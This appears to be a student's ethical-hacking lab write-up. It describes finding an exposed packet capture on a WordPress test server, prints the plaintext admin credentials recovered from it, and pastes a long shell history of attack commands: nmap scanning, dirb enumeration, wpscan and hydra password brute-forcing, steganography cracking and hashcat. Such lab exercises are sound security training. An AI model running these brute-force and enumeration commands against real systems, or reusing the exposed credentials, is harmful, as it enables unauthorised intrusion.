# Assignment 1 (Ethical Hacking) ## Muhammad Rafay | 18L-1016 | A # Summary: The dirb command to extract endpoints of an HTTP server, focusing on both listable and non-listable but publicly accessible endpoints. The goal was to explore these endpoints systematically until discovering a significant endpoint, namely "/ipdata." Upon accessing this endpoint, the assignment led to the discovery of an "analyze.cap" file. Subsequently, the "analyze.cap" file was analyzed using Wireshark, a network protocol analyzer, to investigate the contents. Within this file, a POST request was identified, containing plain credentials in the form of a password passed to the admin of a WordPress page. This discovery is crucial as it highlights potential security vulnerabilities within the system, emphasizing the importance of conducting ethical hacking exercises to identify and mitigate such risks before malicious actors can exploit them. Credentials obtained: username: **webdeveloper** password: **Te5eQg&4sBS!Yr$)wf%(DcAd** ## Commands Executed to retrieve data obtained from zsh_history file: ```bash= wget http://192.168.0.101/wp-content/themes/twentyseventeen/screenshot.png steghide --extract -sf screenshot.png stegcracker stegcracker screenshot.png /usr/share/wordlists/rockyou.txt.gz stegcracker screenshot.png /usr/share/wordlists/rockyou.txt cd /usr/share/wordlists ls unzip rockyou.txt.gz gzip -d rockyou.txt.gz sudo gzip -d rockyou.txt.gz ls cd - stegcracker screenshot.png /usr/share/wordlists/rockyou.txt stegseek stegseek screenshot.png /usr/share/wordlists/rockyou.txt pyrit sudo apt install pyrit sudo apt update && sudo apt install pyrit ip a netdiscover sudo netdiscover nmap 192.168.48.1 -p- -sV nmap 192.168.48.2 -p- -sV nmap 192.168.48.254 -p- -sV netdiscover sudo netdiscover nmap 192.168.48.1 -p- -sV nmap 192.168.0.101 -p- -sV dirb http://192.168.0.101 ls dirb http://192.168.0.101 /usr/share/wordlists/rockyou.txt sudo apt install aircrack-ng wget [200~ ~ wget https://github.com/jspw/Crack-WIFI-WPA2/raw/master/cap2hccapx.c ls *.cap cd Downloads ls *.cap mv analyze.cap .. cd .. mv analyze.cap file.cap ./cap2hccapx file.cap file.hccapx\ ls file file.cap ./cap2hccapx file.cap file.hccapx\ wpscan wpscan --url http://192.168.0.101/wp-login.php -P /usr/share/wordlists/rockyou.txt echo webdeveloper >> users.txt && wpscan --url http://192.168.0.101/wp-login.php -U users.txt -P /usr/share/wordlists/rockyou.txt [200~wpscan --url http://192.168.0.101/wp-login.php -U users.txt -P /usr/share/wordlists/rockyou.txt ~ wpscan --url http://192.168.0.101/wp-login.php -U users.txt -P /usr/share/wordlists/rockyou.txt\ wpscan --url http://192.168.0.101/wp-login.php -U users.txt -P /usr/share/wordlists/rockyou.txt --force mkdir images cd images wget -r --no-parent http://192.168.0.101/wp-content/themes/twentyseventeen/assets/images/ ls cd 192.168.0.101 ls cd wp-content ls cd themes ls cd twentyseventeen ls cd assets ls cd images ls mv *.jpg ~/images cd ~/images ls rm -rf 192.168.0.101 ls clear code ~/.zshrc sudo apt install micro micro ~/.zshrc sudo apt install fzf cd assets stegseek --extract -sf coffee.jpg stegseek coffee.jpg /usr/share/wordlists/rockyou.txt stegseek espresso.jpg /usr/share/wordlists/rockyou.txt stegseek header.jpg /usr/share/wordlists/rockyou.txt stegseek sandwich.jpg /usr/share/wordlists/rockyou.txt hydra -t 4 -l webdeveloper -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.101 hydra -t 4 -l webdeveloper -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.101 -R hashcat echo e37610d84c63d90bb61a8f78587cb4b4 >> hashes hashcat -m 0 hashes /usr/share/wordlists/rockyou.txt dirb http://192.168.0.101 /usr/share/wordlists/rockyou.txt -w dirb http://192.168.0.101 -w dirb -w http://192.168.0.101 ls /usr/share/wordlists/dirb dirb http://192.168.0.101 /usr/share/wordlists/dirb/indexes.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/big.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/mutations_common.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/catala.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/extensions_common.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/vulns/apache.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/vulns/cgis.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/vulns/axis.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/vulns/tomcat.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/euskera.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/others/best1050.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/others/names.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/stress/alphanum_case_extra.txt dirb http://192.168.0.101 /usr/share/wordlists/dirb/stress/uri_hex.txt clear ls htop exit sudo apt install flameshot sudo apt install marktext clear whoami sudo apt install kali sudo apt install kitty kitty clear date clear htop clear dirb http://192.168.0.101 /usr/share/wordlists/dirb/common.txt clear dirb http://192.168.0.103 clear ls file* xdg-open file.cap clear exit ``` ## Accessed Admin Interface:  ## Screenshots:  Obtained analyze.cap from **ipdata** endpoint.    Examined POST request to see plain credentials passed and tried on the web application to get it to work.